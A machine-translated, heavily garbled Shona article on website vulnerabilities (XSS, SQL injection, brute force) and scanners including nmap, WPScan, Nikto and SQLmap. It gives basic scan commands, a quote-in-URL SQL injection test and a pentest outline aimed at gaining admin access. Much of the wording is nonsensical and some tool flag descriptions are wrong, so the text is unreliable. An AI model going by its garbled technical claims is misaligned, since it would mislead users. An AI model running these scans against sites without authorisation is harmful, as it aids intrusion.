Kubatsirwa nzvimbo. Website check. Program kuti atarise nzvimbo kubatsirwa

Website kuchengeteka nyaya kumbova sezvo chenjera sezvo muzana remakore rechi21. Chokwadi, ichi imhaka Comprehensive kuparadzirwa Internet mune zvinenge zvose maindasitiri uye minda. Zuva nezuva, hackers nokuchengeteka nyanzvi akawana vashomanana itsva kubatsirwa zvepaIndaneti. Vakawanda vavo vari pakarepo akapfigwa varidzi uye Developers, asi vamwe vanoramba sezvo iri. Iro rinoshandiswa vacho. Asi kushandisa hacked nzvimbo zvinogona kukuvadza zvikuru vose vanoshandisa ayo uye servers pamusoro icho nepekugara.

Types nzvimbo kubatsirwa

Kana ukaronga Web mapeji anoshandiswa chaizvo chokuita zvemagetsi ruzivo. Mimwe michina uye nguva-vaedzwa, uye vamwe vane itsva uye vasina zvasakara. Chero zvazvingava, pane zvakawanda mhando nzvimbo pamusoro kubatsirwa:

• XSS. Mumwe nzvimbo ane diki chimiro. Vanobatsira vanozvishandisa kupinda mashoko uye kuwana mugumisiro, kunyoresa rinoitwa kana kutumira mashoko. Kuzvitsinhanisa muchimiro dzinokosha tsika kungamutsawo kuuraya imwe manyorero, izvo zvinogona kukonzera kutyorwa kuvimbika nzvimbo uye zvinopesana mashoko.
• SQL-jekiseni. A zvakajairika chaizvo uye kubudirira kuwana zvakavanzika mashoko. Izvi zvinogona kuitika kana kuburikidza pakero nemizariro, kana vachishandisa chimiro. Masero ari kuitwa dzinomiririra tsika kuti hazvigoni yakasvinwa mumanyoro uye mubvunzo kuti Database. Uye nezivo zvakakodzera zvinogona kukonzera chokumbofanobata rusvingo.

• HTML-kukanganisa. Zvinenge kufanana kuti ari XSS, asi haana midzi manyorero code, uye HTML.
• The munjodzi nzvimbo chokuita placement kuti mafaira uye Directories ari default munzvimbo. Somuenzaniso, kuziva mamiriro pawebsite, unogona kusvika Kutarisirwa Panel remitemo.
• Kushomeka kuchengetedza setup yacho uchishandisa maitiro pamusoro Server. Kana, kuti munjodzi aripo, ipapo zvebhinya vanofanira kukwanisa kuuraya zvemasanga romutemo.
• Bad mavara echivande. Chimwe chezvinhu pachena kubatsirwa nzvimbo - kushandisa simba tsika kudzivirira nhoroondo dzavo. Kunyanya kana chiri Mudzviti.
• Buffer dzakayerera. Richishandiswa kana kutsiviwa umboo kubva ndangariro, kuitira kuti unogona kuchinja dzavo. It kunoitika apo kunobatanidza usashandisa kukwana.
• Pavanotsiva zvikamu yenyu nzvimbo. Recreating chaiyo kopi Website kuburikidza kutema kusvika anoishandisa ndiani haigoni vanofungidzirwa kuva nzira uye kupinda kwako pachako mashoko, kwapera nguva unopfuura vavashungurudza.
• Kuramba basa. Kazhinji ichi izwi iri vakanzwisisa kurwisa Server kana anogamuchira vakawanda zvikumbiro vasingagoni kubata, uye anongoti "anosiya" kana zvava kukwanisa kushumira vanoshandisa izvi. The munjodzi iri pakuti munhu IP Sefa haina configured zvakanaka.

Vulnerability Scan Site

Security nyanzvi ichiitwa rinokosha odhita pakati web zvekuvaka kukanganisa uye zvikanganiso zvinogona kukonzera cracking walnut. Kwakadaro ongororo nzvimbo inonzi pentesting. Kwacho inoongorora tsime bumbiro rakashandiswa CMS, kuvapo vasanonoka modules uye nemimwe miedzo yakawanda dzinonakidza.

SQL-jekiseni

Izvi mhando yokuedzwa nzvimbo kunotema kana manyorero filters Received tsika mukugadzirwa zvikumbiro kuna Database. Kuitisa bvunzo nyore kunogona manually. How kuwana SQL munjodzi panzvimbo? Ndiani ichakurukurwa.

Somuenzaniso, pane imwe nzvimbo yangu-sayt.rf. Papeji yaro pamberi ane katarogu. Vachipinda nayo, unogona kuwanikwa kero bhaa zvakada yangu-sayt.rf /? Product_id = 1. Kunenge kuti iyi ndiyo chikumbiro kuna Database. Kuti uwane nzvimbo kubatsirwa anogona kutanga kuedza kutsiva Napamusara rimwe mazwi. Somugumisiro, vanofanira kuva vangu-sayt.rf /? Product_id = 1 '. Kana achizviendesa "Pindai" bhatani papeji, kukanganisa mashoko, ari munjodzi ariko.

Zvino unogona kushandisa nzira dzakasiyana-siyana kuti kusarudzwa tsika. Used mubatanidzwa dzaishandisa kunze, kupindura uye nevamwe vakawanda.

XSS

Izvi mhando munjodzi angava mhando mbiri - basa uye kungogara.

Active zvinoreva kutanga chimedu remitemo iri Database kana ari faira pamusoro Server. Hazvina ngozi zvikuru uye nezvimwewo.

Pusa muoti kunosanganisira kuchitsausa akatambudzwa yakananga Kero yepaIndaneti ine bumbiro kwakaipa.

Uchishandisa XSS vavashungurudza aigona kuba Cookies. Uye ingasanganisira kukosha User Data. Kunyange zvakawanda migumisiro yakaipa atora pachirongwa.

Uyewo, mashoko anokwanisa kushandisa manyorero panzvimbo kuitira kuti aumbe panguva vakatumira akapa anoishandisa mashoko zvakananga mumaoko ane vavashungurudza.

Kushandisa michina yacho kutsvaka kwacho

Nemambure angawana yakawanda dzinonakidza munjodzi scanners nzvimbo. Vamwe vanouya oga, vamwe kuuya vanoverengeka zvakafanana uye akabatanidzwa kuva mufananidzo chete, kufanana kali Linux. Acharamba muchidimbu zvikuru dzakakurumbira nematurusi michina muitiro nekunhonga ruzivo pamusoro kubatsirwa.

Nmap

Nyore Website munjodzi scanner kuti anogona kuratidza mashoko akadai uchishandisa maitiro akashandiswa zviteshi uye mabasa. Typical mafomu:

nmap -sS 127.0.0.1, apo panzvimbo IP kero yeko zvakafanira kutsiva chaidzo bvunzo yacho.

Mhedziso mushumo pane basa vari kumhanya pamusoro payo, uye izvo zvengarava anosvinurira panguva ino. Mashoko aya, unogona kuedza kushandisa kutoziva munjodzi.

Hedzino zvishoma zvinoita kuti nmap Shandisa scan kutsvetera:

• Chiteshi. Aggressive Ongororo kuti dumped zvakawanda, asi zvinogona kutora nguva.
• -O. Zvinonzi kuedza kuziva uchishandisa mamiriro kushandiswa Server yenyu.
• -D. Spoof imwe IP kero iyo cheki chinoitwa kuti kana uchiona zvaisaita Server matanda kuziva apo kurwisa kwakaitika.
• -p. Kuwanda zvengarava. Vachiongorora mabasa akawanda kuti yakazaruka.
• -S. Kunoitawo kuti kutaridzwa kwakarurama IP kero.

WPScan

chirongwa ichi kuti atarise nzvimbo kubatsirwa zvaisanganisira mu kali Linux kugovera. Yakagadzirwa kuongorora padandemutande pfuma pamusoro WordPress CMS. zvakanyorwa muna Ruby, kumhanya saka sezvizvi:

Ruby ./wpscan.rb --help. murayiro ino icharatidza zvinowanikwa zvose zvavanogona uye tsamba.

murayiro zvinogona kushandiswa kumhanya bvunzo nyore:

Ruby ./wpscan.rb --url some-sayt.ru

Vakawanda WPScan - runako nyore kushandisa utility kuedza kwako nzvimbo "Wordpress" maburi.

Nikto

Program nzvimbo kuongorora kuti kubatsirwa, riri kuwanikwa kali Linux kugovera. Inopa nezvaanogona simba rayo rose nyore:

• Scan dzakati pamwe HTTP uye https;
• pavaigona kutora chikepe chaienda zhinji yakavakwa-vasabatwa Ezvemutauro;
• vakawanda chiteshi kushanda pakuvheneka, kunyange vasiri mureza yokuzadzisa;
• kutsigira kushandiswa Marshal servers;
• zvinoita kuti pave uye kubatana chivhariso-dzi.

Kutanga nikto vanofanira negadziriro yave yakaiswa perl. The nyore ongororo rinoitwa sezvinotevera:

perl nikto.pl -h 192.168.0.1.

Chirongwa zvinogona "zvokudya" rugwaro faira Rinoratidza paWeb server kero:

perl nikto.pl -h file.txt

chokushandisa Izvi zvichabatsira kwete chete kuchengeteka nenyanzvi kuti kuitisa Pentest, asi nomumbure vakuru zvinhu kuramba utano nzvimbo.

Burp Suite

A simba zvikuru kuongorora kwete chete nzvimbo, asi richiona chinhu samambure. Ko pakuvara kushanda nadzurudzo zvikumbiro zvakaiswa pamusoro bvunzo Server. Smart scanner aigona kungoerekana tsvaka mhando inoverengeka kubatsirwa panguva kamwe. Zvinokwanisika kuponesa mugumisiro magetsi mabasa uye ipapo tangaizve nayo. Kubvuma sanduko kushandisa kwete chete yechitatu-party chivhariso-dzi, asi kunyora yako.

The utility ine yayo graphical User inowanikwa, riri mubvunzo nyore, kunyanya nokuti ruzivo vanoshandisa.

SQLmap

Zvichida kupfuura nyore uye simba mudziyo yokutsvaka SQL uye XSS kubatsirwa. Nyora ayo zvakwakanakira kungaratidzwa se:

• Support zvinenge mhando dzose Database utariri enyika;
• kukwanisa kushandisa nhanhatu dzinokosha nzira yokuziva application uye SQL-jekiseni;
• Users busting rudzi, avo hashes, mavara echivande uye mamwe mashoko.

Asati kushandisa SQLmap Kazhinji kutanga akawana anodzivirira nzvimbo Via imwe dork - varara mubvunzo kutsvaka injini kukubatsira Anosakurawo kunze kwacho kupfuma zvakakodzera web.

Ipapo Kero peji iri zvaitambidzwa purogiramu, uye anoongorora. Kana vakabudirira, tsanangudzo munjodzi utility anogona pacharo uye kushandiswa kwayo kuwana uoinde kuti upfumi.

Webslayer

A utility diki unokubvumira kurwisa ndakafanana simba. Chinga "ndakafanana simba" zvipenyu, yechirongwa parameters nzvimbo. It inotsigira multi-threading, hunobata chokupika ndiyo yakanaka. Unogonawo kusarudza mavara echivande recursively nested mapeji. Pane Marshal rutsigiro.

Resources kuongorora

In nemambure pane zvishandiso wandei kuedza munjodzi paIndaneti nzvimbo:

• coder-diary.ru. Simple nzvimbo kunovhenekwa. Just kupinda kero, kuti riwedzere uye tinya "Check". The kutsvaka anogona kutora nguva refu, saka unogona tsanangurai email address kuti vauye pakupera mugumisiro zvakananga kumucheri bvunzo. pane anenge 2,500 anozivikanwa kubatsirwa mune nzvimbo.
• https://cryptoreport.websecurity.symantec.com/checker/. Online Service cheki nokuda SSL uye TLS chitupa kubva kambani Symantec. Zvinoda chete kero, kuti upfumi.
• https://find-xss.net/scanner/. The chirongwa chinhu chakaparadzana PHP faira kutarira Websites nokuda kubatsirwa kana ZIP arşive. Unogona kutaridzwa mhando mafaira kuti tarisa uye zviratidzo, izvo kudzivirirwa pachishandiswa mashoko ari manyorero.
• http://insafety.org/scanner.php. Scanner yokuedza nzvimbo pachikuva "1C-Bitrix". Simple uye nzwisisa inowanikwa.

The algorithm nokuti kushanda pakuvheneka nokuda kubatsirwa

Chero samambure kuchengeteka nyanzvi anoita cheki pamusoro nyore algorithm:

1. Pakutanga manually kana nokushandisa zvoga zvokushandisa kuongorora kana paine paIndaneti munjodzi. Kana hongu, zvino anosarudza zvavo mhando.
2. Zvichienderana kwemarudzi chipo munjodzi anovaka mamwe unotii. Somuenzaniso, kana tikaziva kuti CMS, ipapo kusarudza zvakakodzera nzira kurwiswa. Kana chiri SQL-jekiseni, asi vakasarudzwa queries kusvika Database.
3. Chinangwa chikuru chemusha ndiko kuwana ropafadzo kuwana administrative remadziro. Kana zvakanga zvisingaiti kuti vawane vakadaro, pamwe zvinokosha kuti kuedza uye dzinoumba nyepera kero pakatanga manyorero yake haizopereri kuchinjwa rechipfuwo.
4. Kana Kurwisa kana kupinda zvinopera, hunotanga nekunhonga date: pane zvakawanda munjodzi izvo zvikanganiso varipo.
5. Pachishandiswa mashoko kuchengeteka nyanzvi inoti muridzi nzvimbo nezvematambudziko uye sei kuzvigadzirisa.
6. Kubatsirwa zvinopedzwa maoko ake kana achibatsirwa rechitatu-party vanatenzi.

A shoma chengetedzo mazano

Vaya vaizviti inokudziridza yayo Website, zvichabatsira ichi mazano nyore uye anonyengera.

Kuuya Data anofanira yakasvinwa kuti mumanyoro kana queries havagoni kumhanya kumira-oga kana kuti kupa umboo kubva Database.

Shandisa kunzwisisa uye simba mavara echivande kuvhura Kutarisirwa Panel, kuitira kudzivisa mumwe zvichibvira ndakafanana simba.

Kana Website kunobva the CMS, unofanira rekukwazisa nekusimba plugins, templates uye modules kunogona kakawanda dzifambirane uye kushandisa. Regai wakaremedza nzvimbo ine basa zvinoriumba.

Kazhinji tarisa Server matanda upi kufungira zvichiitika kana zviito.

Check yako nzvimbo dzakawanda scanners uye mabasa.

Yakarurama Server configuration - kiyi yacho yakagadzikana uye njodzi oparesheni.

Kana zvichibvira, kushandisa SSL chitupa. Izvi zvichaita kuti kuvhura pachako kana zvakavanzika Data pakati server inodzidzisa.

Zviridzwa kuchengeteka. Zvine musoro kuisa kana kubatanidza Software kudzivirira kupindira uye kwokunze vanotyisidzirwa.

mhedziso

Nyaya akatendeuka zvakanaka misha, asi kunyange hazvina kukwana hunonyatsodonongodza zvose zvinobatanidzwa samambure kuchengeteka. Kutsungirira dambudziko mashoko kuchengeteka, zvinokosha kuti tidzidze zvakawanda zvinhu uye mirayiridzo. Uyewo kudzidza boka maturusi uye michina. Unogona kutsvaka mazano uye kubatsira kubva makambani nyanzvi kuti dzidzira muna Pentest uye odhita padandemutande pfuma. Kunyange zvazvo mabasa aya, uye vachadzokera kunyika yakanaka mari, zvose zvakafanana nzvimbo kuchengeteka zvinogona zvikuru zvinodhura nemashoko zvoupfumi uye reputational.